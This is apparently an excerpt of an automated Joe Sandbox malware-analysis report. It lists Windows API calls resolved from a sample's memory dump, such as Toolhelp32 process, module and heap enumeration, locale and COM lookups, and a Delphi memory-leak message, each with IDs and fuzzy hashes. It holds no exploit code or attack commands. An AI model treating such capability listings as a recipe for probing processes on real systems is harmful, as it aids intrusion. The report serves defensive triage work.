                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1263568516-0
                                                                                                                                • Opcode ID: 97f519263cb5df7011c1af165be911f97bbda741756247ca3623780b237330ed
                                                                                                                                • Instruction ID: 86618f5e5291e47f99156ca1a41058ff12f6aa9fbee49080096b6405d6bf4e10
                                                                                                                                • Opcode Fuzzy Hash: 97f519263cb5df7011c1af165be911f97bbda741756247ca3623780b237330ed
                                                                                                                                • Instruction Fuzzy Hash: C5E0C2B5320301AFEB105F7E5D80B12BBDCEF48664FA444BAF749DB381D2A0E8108B64
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02B2ADA3,?,?,02B2AE35,00000000,02B2AF11), ref: 02B2AB30
                                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02B2AB48
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02B2AB5A
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02B2AB6C
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02B2AB7E
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02B2AB90
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02B2ABA2
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02B2ABB4
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02B2ABC6
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02B2ABD8
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02B2ABEA
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02B2ABFC
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02B2AC0E
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02B2AC20
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02B2AC32
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02B2AC44
                                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02B2AC56
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                • API String ID: 667068680-597814768
                                                                                                                                • Opcode ID: e221cf159f21c2b11cdf0c78b245a353d1add516cfbe8ce126889cb33164d392
                                                                                                                                • Instruction ID: 9850fc4cf9ed551eaefa7cc161c4787925d1fdafef42a73977c19078ce779546
                                                                                                                                • Opcode Fuzzy Hash: e221cf159f21c2b11cdf0c78b245a353d1add516cfbe8ce126889cb33164d392
                                                                                                                                • Instruction Fuzzy Hash: 3B3114F0A91360AFEF00EBB4D985A6977E8EB16781B401DE1F805CF219EA74E804DF11
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B15925
                                                                                                                                • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02B1593C
                                                                                                                                • lstrcpynA.KERNEL32(?,?,?), ref: 02B1596C
                                                                                                                                • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B159D0
                                                                                                                                • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B15A06
                                                                                                                                • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B15A19
                                                                                                                                • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B15A2B
                                                                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B1737C,02B10000,02B3E790), ref: 02B15A37
                                                                                                                                • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B1737C,02B10000), ref: 02B15A6B
                                                                                                                                • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B1737C), ref: 02B15A77
                                                                                                                                • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02B15A99
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                • API String ID: 3245196872-1565342463
                                                                                                                                • Opcode ID: c4cff8e046979f3f225ec367358ea433210ad60c419e9a9d5ed35ed01914e410
                                                                                                                                • Instruction ID: 905c21ffe8dacf7c1d34f93c8a29a4feee15821d9281af3665a937d068eacd2e
                                                                                                                                • Opcode Fuzzy Hash: c4cff8e046979f3f225ec367358ea433210ad60c419e9a9d5ed35ed01914e410
                                                                                                                                • Instruction Fuzzy Hash: 9A418171E10619AFDB20DAE8CC88ADEB3BDEF48340FC445E5A658E7245E774DA448F90
                                                                                                                                APIs
                                                                                                                                • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B15BE8
                                                                                                                                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B15BF5
                                                                                                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B15BFB
                                                                                                                                • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B15C26
                                                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B15C6D
                                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B15C7D
                                                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B15CA5
                                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B15CB5
                                                                                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B15CDB
                                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B15CEB
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                • API String ID: 1599918012-2375825460
                                                                                                                                • Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                                • Instruction ID: 62d51a6d47bec3f5ff2a09b0e2781232562ec7bd0e096047ac09988cb12e3b6a
                                                                                                                                • Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                                • Instruction Fuzzy Hash: 1B318471E4026C6AEB35DAB89C85FDF77AD9B44380FC401E29648E6181DB749F848F90
                                                                                                                                APIs
                                                                                                                                • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02B17FF5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DiskFreeSpace
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1705453755-0
                                                                                                                                • Opcode ID: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
                                                                                                                                • Instruction ID: d1b01f7b7ecbb76af78f08fd2bddc1c0b1fe0ed451d2bfef95bd40ca9d615cc0
                                                                                                                                • Opcode Fuzzy Hash: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
                                                                                                                                • Instruction Fuzzy Hash: A311C0B5A00209AF9B04CF99C881DBFF7F9FFC8300B54C569A509E7254E6719A018B90
                                                                                                                                APIs
                                                                                                                                • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B1A7E2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoLocale
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2299586839-0
                                                                                                                                • Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                                • Instruction ID: 2c0be3ec501732e34097e27960e5e910dff8cef024a2f81397b4d0f33d2c2540
                                                                                                                                • Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                                • Instruction Fuzzy Hash: 0BE0D871B0021417D311A5589C80EF6736D9B58310F8042FABD15C7385EDE0AE848BE4
                                                                                                                                APIs
                                                                                                                                • GetVersionExA.KERNEL32(?,02B3D106,00000000,02B3D11E), ref: 02B1B79A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Version
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1889659487-0
                                                                                                                                • Opcode ID: 1ca47c8ba3a81762b4421bee666ac1a0309ecbeb84c6d260fdcdcd5bc6f48df8
                                                                                                                                • Instruction ID: 912d13be15c01edde08139fe5364f143dfaa3b64daf79b64149dd6a9a1cbc3a1
                                                                                                                                • Opcode Fuzzy Hash: 1ca47c8ba3a81762b4421bee666ac1a0309ecbeb84c6d260fdcdcd5bc6f48df8
                                                                                                                                • Instruction Fuzzy Hash: E4F09D74A44301DFD350DF28D441A1AB7E9FF48B94F808DAAEA9887380E734D8148B52
                                                                                                                                APIs
                                                                                                                                • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02B1BE72,00000000,02B1C08B,?,?,00000000,00000000), ref: 02B1A823
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoLocale
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2299586839-0
                                                                                                                                • Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                                                • Instruction ID: d587ccab2ad496537fb049c2a83c85784c3b01e094b5767708e64874f5dbb2d0
                                                                                                                                • Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                                                • Instruction Fuzzy Hash: 1CD05EA670E2602AA210A15A2D84DBB5ADCCFC67A1F8040BAB988C6101D210DD07DAB1
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LocalTime
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 481472006-0
                                                                                                                                • Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                                                                • Instruction ID: 52f9ffa0ec4a7821e472b7f731096f940d11e3a87547e6358cbbc9d5af24f82d
                                                                                                                                • Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                                                                • Instruction Fuzzy Hash: F0A0124040582041854033180C0257431455921A20FC4878068F8402D0E91D01208093
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 496cc97dc467e2ed5abe413d305ea60b2081591f6e43546630f843c8a76cb622
                                                                                                                                • Instruction ID: 840064d389c783b3031a2b8e4f26eea228478de0f43b006a8fde208c4f262957
                                                                                                                                • Opcode Fuzzy Hash: 496cc97dc467e2ed5abe413d305ea60b2081591f6e43546630f843c8a76cb622
                                                                                                                                • Instruction Fuzzy Hash: B151599285E3D14FC7638B7448BA1C23FB0AD3362435E51CBC8D09F1A3E209991BDB62
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                                                • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02B1D29D
                                                                                                                                  • Part of subcall function 02B1D268: GetProcAddress.KERNEL32(00000000), ref: 02B1D281
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                • API String ID: 1646373207-1918263038
                                                                                                                                • Opcode ID: b443657c2734cd024e7598013f2844046adc9808b9b82cd93c0809a548f52abf
                                                                                                                                • Instruction ID: ab797fb8c09b08b16e4b5de84b03299ad6174d89a9e79b7915815f80c00cded5
                                                                                                                                • Opcode Fuzzy Hash: b443657c2734cd024e7598013f2844046adc9808b9b82cd93c0809a548f52abf
                                                                                                                                • Instruction Fuzzy Hash: 5C4180E3AA830A5B52086B6EB500427FBDED345B503E046DBF884CB384DD74FC518A6E
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02B26EDE
                                                                                                                                • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02B26EEF
                                                                                                                                • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02B26EFF
                                                                                                                                • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02B26F0F
                                                                                                                                • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02B26F1F
                                                                                                                                • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02B26F2F
                                                                                                                                • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02B26F3F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                                • API String ID: 667068680-2233174745
                                                                                                                                • Opcode ID: 8f5a95351153522a1582fba12d6dd480a43677f41fb71cb39ff725e988e19850
                                                                                                                                • Instruction ID: a25fb6b2bde3ef0bcc12d3f4fc15160cb17dd42138a1a575ed5fffbaa3f07075
                                                                                                                                • Opcode Fuzzy Hash: 8f5a95351153522a1582fba12d6dd480a43677f41fb71cb39ff725e988e19850
                                                                                                                                • Instruction Fuzzy Hash: E8F050F0A8A351BDBF00FB745CC18AA375DAF246443401CD6F91B56556FB75D8188F10
                                                                                                                                APIs
                                                                                                                                • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02B128CE
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2187835490.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.2187756035.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.2188328894.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2b10000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Message
                                                                                                                                • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                                • API String ID: 2030045667-32948583
                                                                                                                                • Opcode ID: 903978b729aacb5ddda16b82b3b9124eaf4e57fbd2b33411e07235d969c7761f
                                                                                                                                • Instruction ID: 5507c5600d56c3f15398d43084f1c377e7a5ebc66945d8ed52f2b813e81388f0
                                                                                                                                • Opcode Fuzzy Hash: 903978b729aacb5ddda16b82b3b9124eaf4e57fbd2b33411e07235d969c7761f
                                                                                                                                • Instruction Fuzzy Hash: 04A1D230A042B88BDF21AA2CCC84B99B7E5EF09350F9441F5ED49AB386CB7599C5CF51
                                                                                                                                Strings
                                                                                                                                • Unexpected Memory Leak, xrefs: 02B128C0
